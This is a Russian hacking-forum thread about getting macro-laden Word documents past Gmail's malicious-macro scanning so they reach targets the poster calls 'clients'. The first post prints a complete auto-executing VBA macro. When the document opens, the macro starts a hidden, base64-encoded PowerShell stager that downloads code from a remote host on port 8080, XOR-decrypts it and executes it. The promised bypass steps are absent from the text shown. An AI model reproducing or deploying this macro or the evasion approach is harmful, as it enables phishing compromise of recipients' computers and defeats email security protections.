Обход проверки вредоносных макросов сервисами gmail

Тема в разделе "Этичный хакинг и тестирование на проникновение", создана пользователем ~~DarkNode~~, 21 ноя 2016.

Наш партнер Genesis Hackspace
  1. ~~DarkNode~~

    ~~DarkNode~~ ~^_Wired FaLc❍n_^~
    Команда форума Grey Team

    Регистрация:
    19 окт 2016
    Сообщения:
    357
    Симпатии:
    1.121
    Привет колеги. Вы уж извините , но это статья будет короткая но со смыслом)))
    Как большинство из вас знает,почта gmail всячески не дает нам отсылать вредоносные макросы нашим так сказать клиентам)
    И вот некоторыми хорошими людьми было замечено что службы gmail парсят в макросах документа определенные слова,в случае обнаружение таких будет уведомления о том что в документе обнаружен вирус , и в лучшем случае письмо просто попадет в спам,а обычно даже отослать не дают.
    Обход проверки вредоносных макросов сервисами gmail
    Обходится это очень и очень просто)

    Если у нас код макроса следующего вида:

    Код (Text):
    Sub AutoOpen()
        Debugging
    End Sub

    Sub Document_Open()
        Debugging
    End Sub

    Public Function Debugging() As Variant
        Dim Str As String
        str = "powershell.exe -NoP -sta -NonI -W Hidden -Enc WwBT"
        str = str + "AHkAcwB0AGUAbQAuAE4ARQBUAC4AUwBlAHIAVgBJAEMARQBQAG"
        str = str + "8ASQBOAHQATQBhAE4AQQBnAEUAUgBdADoAOgBFAFgAcABFAEMA"
        str = str + "VAAxADAAMABDAG8ATgB0AGkAbgBVAEUAIAA9ACAAMAA7ACQAVw"
        str = str + "BjAD0ATgBlAFcALQBPAEIAagBlAEMAVAAgAFMAeQBzAFQARQBt"
        str = str + "AC4ATgBlAFQALgBXAGUAYgBDAEwASQBFAE4AVAA7ACQAdQA9AC"
        str = str + "cATQBvAHoAaQBsAGwAYQAvADUALgAwACAAKABXAGkAbgBkAG8A"
        str = str + "dwBzACAATgBUACAANgAuADEAOwAgAFcATwBXADYANAA7ACAAVA"
        str = str + "ByAGkAZABlAG4AdAAvADcALgAwADsAIAByAHYAOgAxADEALgAw"
        str = str + "ACkAIABsAGkAawBlACAARwBlAGMAawBvACcAOwAkAHcAQwAuAE"
        str = str + "gAZQBhAEQARQBSAFMALgBBAEQARAAoACcAVQBzAGUAcgAtAEEA"
        str = str + "ZwBlAG4AdAAnACwAJAB1ACkAOwAkAFcAYwAuAFAAUgBPAHgAWQ"
        str = str + "AgAD0AIABbAFMAeQBTAFQARQBNAC4ATgBFAFQALgBXAEUAYgBS"
        str = str + "AEUAcQB1AGUAcwBUAF0AOgA6AEQAZQBGAGEAVQBsAHQAVwBFAG"
        str = str + "IAUABSAG8AeAB5ADsAJABXAGMALgBQAFIAbwBYAHkALgBDAFIA"
        str = str + "ZQBkAGUATgB0AEkAQQBMAHMAIAA9ACAAWwBTAHkAUwBUAEUAbQ"
        str = str + "AuAE4ARQBUAC4AQwBSAGUAZABlAE4AdABJAGEAbABDAEEAQwBI"
        str = str + "AEUAXQA6ADoARABFAEYAYQBVAEwAdABOAGUAdAB3AE8AUgBLAE"
        str = str + "MAUgBlAGQAZQBuAHQASQBBAEwAUwA7ACQASwA9ACcAeQAzAGAA"
        str = str + "QQAuAGQAZgBsAFMAYgBNAFcAKwB6AEcAdwBWADkAQgBeADAAPQ"
        str = str + "BcADQAYwAkAHIAWwBnACUAUQBOACcAOwAkAGkAPQAwADsAWwBj"
        str = str + "AGgAYQByAFsAXQBdACQAQgA9ACgAWwBjAEgAQQBSAFsAXQBdAC"
        str = str + "gAJAB3AGMALgBEAG8AVwBOAEwATwBBAGQAUwBUAHIASQBuAGcA"
        str = str + "KAAiAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEAMw"
        str = str + "A3AC4AMQAzADcAOgA4ADAAOAAwAC8AaQBuAGQAZQB4AC4AYQBz"
        str = str + "AHAAIgApACkAKQB8ACUAewAkAF8ALQBCAFgAbwByACQASwBbAC"
        str = str + "QAaQArACsAJQAkAGsALgBMAGUAbgBnAHQASABdAH0AOwBJAEUA"
        str = str + "WAAgACgAJABiAC0ASgBPAEkAbgAnACcAKQA="
        Const HIDDEN_WINDOW = 0
        strComputer = "."
        Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
        Set objStartup = objWMIService.Get("Win32_ProcessStartup")
        Set objConfig = objStartup.SpawnInstance_
        objConfig.ShowWindow = HIDDEN_WINDOW
        Set objProcess = GetObject("winmgmts:\\" & strComputer & "\root\cimv2:Win32_Process")
        objProcess.Create str, Null, objConfig, intProcessID
    End Function
     
    Обход проверки вредоносных макросов сервисами gmail

    То для обхождения фильтра нам нужно просто :


    Cпасибо за внимание)
     
    Георгий, Knife, ytreq и 2 другим нравится это.
  2. Ishikawa

    Ishikawa Well-Known Member
    Команда форума Grey Team

    Регистрация:
    15 ноя 2016
    Сообщения:
    98
    Симпатии:
    95
    Старый трюк :)
     
Загрузка...

Поделиться этой страницей